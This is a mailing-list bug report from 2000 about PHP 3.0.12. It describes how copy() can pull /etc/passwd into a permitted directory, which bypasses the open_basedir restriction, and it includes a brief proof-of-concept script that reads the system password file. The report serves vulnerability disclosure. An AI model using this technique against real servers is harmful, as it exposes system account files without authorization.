Bug #3454: Allows access to any directory on server
| From: | norikd at usa dot net | Date: | Fri, 11 Feb 2000 06:38:10 +0000 |
| Subject: | Bug #3454: Allows access to any directory on server | ||
| Groups: | php.dev | ||
| Request: | Send a blank email to php-dev+get-15372@lists.php.net to get a copy of this message | ||
From: norikd@usa.net
Operating system: RedHat 5.1
PHP version: 3.0.12
PHP Bug Type: Other
Bug description: Allows access to any directory on server
php3.ini as follows
safe_mode=1
safe_mode_exec_string=/www/sites/mysite/cgi-bin
doc_root=/www/sites/mysite
open_basedir=/www/sites/mysite
extension=pgsql.so
test.php3
<?php
copy("/etc/passwd","passwd"); /* this works */
$fd=fopen("passwd","r"); /* so does this */
fclose($fd); /* and this */
$fd=fopen("/etc/passwd","r"); /* this does is not successful */
fclose($fd); /* as it should not be */
?>
So the system will allow me to copy the passwd file to a local allowd directory and then open it
which bypasses the fact that I have restricted the system with open_basedir directive.
thanks